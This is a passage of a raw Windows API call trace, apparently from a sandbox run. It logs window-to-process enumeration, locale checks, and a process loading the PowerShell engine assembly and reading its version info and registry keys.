lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x320 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10138, 
lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x184 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7a0 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x400dc, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7bc [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x18c [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x674 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x674 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.545] GetLastError () returned 0x514 [0049.545] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x18c [0049.545] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x18c [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x2009e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x2008c, 
lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x2008e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x20092, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x2009a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x20080, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x3cc [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x100ea, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x76c [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x100e4, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.546] GetLastError () returned 0x514 [0049.546] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x730 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x50076, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x704 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x1006a, 
lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x200fa, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x4d8 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x398 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x10030, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x2002c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x20026, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x5cc [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x1002a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x604 [0049.547] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x174 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x100ca, 
lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x664 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1003e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x301e6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0xb58 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x898 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x888 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x878 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x868 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x858 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1017e, 
lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x848 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x838 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x828 [0049.548] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x818 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x808 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x624 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x1c4 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7ec [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x240 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x404 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x21c [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10154, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x738 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1014e, 
lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x748 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x1f4 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x320 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x184 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7a0 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x300e0, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7bc [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x674 [0049.549] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x18c [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x3cc [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x200fc, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x4d8 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x100f8, 
lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x398 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x1002e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x5cc [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x174 [0049.550] GetLastError () returned 0x514 [0049.550] GetLastError () returned 0x514 [0049.553] WerSetFlags () returned 0x0 [0049.581] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0049.582] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14ef0c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14ef08 | out: pulNumLanguages=0x14ef0c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14ef08) returned 1 [0049.583] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14ef0c, pwszLanguagesBuffer=0x1f3d60c, pcchLanguagesBuffer=0x14ef08 | out: pulNumLanguages=0x14ef0c, pwszLanguagesBuffer=0x1f3d60c, pcchLanguagesBuffer=0x14ef08) returned 1 [0049.621] GetUserDefaultLocaleName (in: lpLocaleName=0x3175c0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0049.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.662] GetLastError () returned 0xcb [0049.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.665] GetLastError () returned 0xcb [0049.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.666] GetLastError () returned 0xcb [0049.690] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.690] GetLastError () returned 0xcb [0049.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.690] GetLastError () returned 0xcb [0049.690] SetErrorMode (uMode=0x1) returned 0x1 [0049.690] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14ee18 | out: lpFileInformation=0x14ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f02680, ftCreationTime.dwHighDateTime=0x1d2f5d2, ftLastAccessTime.dwLowDateTime=0xb7f02680, ftLastAccessTime.dwHighDateTime=0x1d2f5d2, ftLastWriteTime.dwLowDateTime=0xba2e5500, ftLastWriteTime.dwHighDateTime=0x1cb889e, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0049.690] GetLastError () returned 0xcb [0049.690] SetErrorMode (uMode=0x1) returned 0x1 [0049.690] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14ee9c | out: lpdwHandle=0x14ee9c) returned 0x94c [0049.691] GetLastError () returned 0x0 [0049.691] 
GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1f3fb3c | out: lpData=0x1f3fb3c) returned 1 [0049.692] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14ee68, puLen=0x14ee64 | out: lplpBuffer=0x14ee68*=0x1f3fbd8, puLen=0x14ee64) returned 1 [0049.692] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fcb4, puLen=0x14ede0) returned 1 [0049.692] lstrlenW (lpString="Microsoft Corporation") returned 21 [0049.692] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fd08, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="System.Management.Automation") returned 28 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fd64, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fda4, puLen=0x14ede0) returned 1 [0049.693] lstrlenW 
(lpString="System.Management.Automation.dll") returned 32 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fe0c, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fea8, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3ff0c, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: 
lplpBuffer=0x14ede4*=0x1f3ff88, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fc30, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x0, puLen=0x14ede0) returned 0 [0049.694] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x0, puLen=0x14ede0) returned 0 [0049.694] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x0, puLen=0x14ede0) returned 0 [0049.694] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14edd8, puLen=0x14edd4 | out: lplpBuffer=0x14edd8*=0x1f3fbd8, puLen=0x14edd4) returned 1 [0049.694] VerLanguageNameW (in: wLang=0x0, szLang=0x3175c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0049.694] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\", lplpBuffer=0x14edec, puLen=0x14ede8 | out: lplpBuffer=0x14edec*=0x1f3fb64, puLen=0x14ede8) returned 1 [0049.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: 
lpBuffer="") returned 0x0 [0049.699] GetLastError () returned 0xcb [0049.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.710] GetLastError () returned 0xcb [0049.712] lstrlenW (lpString="䅁") returned 1 [0049.715] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14edb0 | out: phkResult=0x14edb0*=0x2f8) returned 0x0 [0049.715] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14edb4 | out: phkResult=0x14edb4*=0x2fc) returned 0x0 [0049.715] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ede8 | out: phkResult=0x14ede8*=0x300) returned 0x0 [0049.716] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ee28, lpData=0x0, lpcbData=0x14ee24*=0x0 | out: lpType=0x14ee28*=0x1, lpData=0x0, lpcbData=0x14ee24*=0x56) returned 0x0 [0049.717] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ee28, lpData=0x3175c0, lpcbData=0x14ee24*=0x56 | out: lpType=0x14ee28*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ee24*=0x56) returned 0x0 [0049.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.721] GetLastError () returned 0x0 [0049.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e930, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.722] GetLastError () returned 0x0 [0049.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.733] GetLastError () returned 0x0 [0049.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.757] GetLastError () returned 0xcb [0049.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0049.969] GetLastError () returned 0x2 [0049.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0049.969] GetLastError () returned 0x2 [0050.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.044] GetLastError () returned 0xcb [0050.045] GetEnvironmentVariableW (in: 
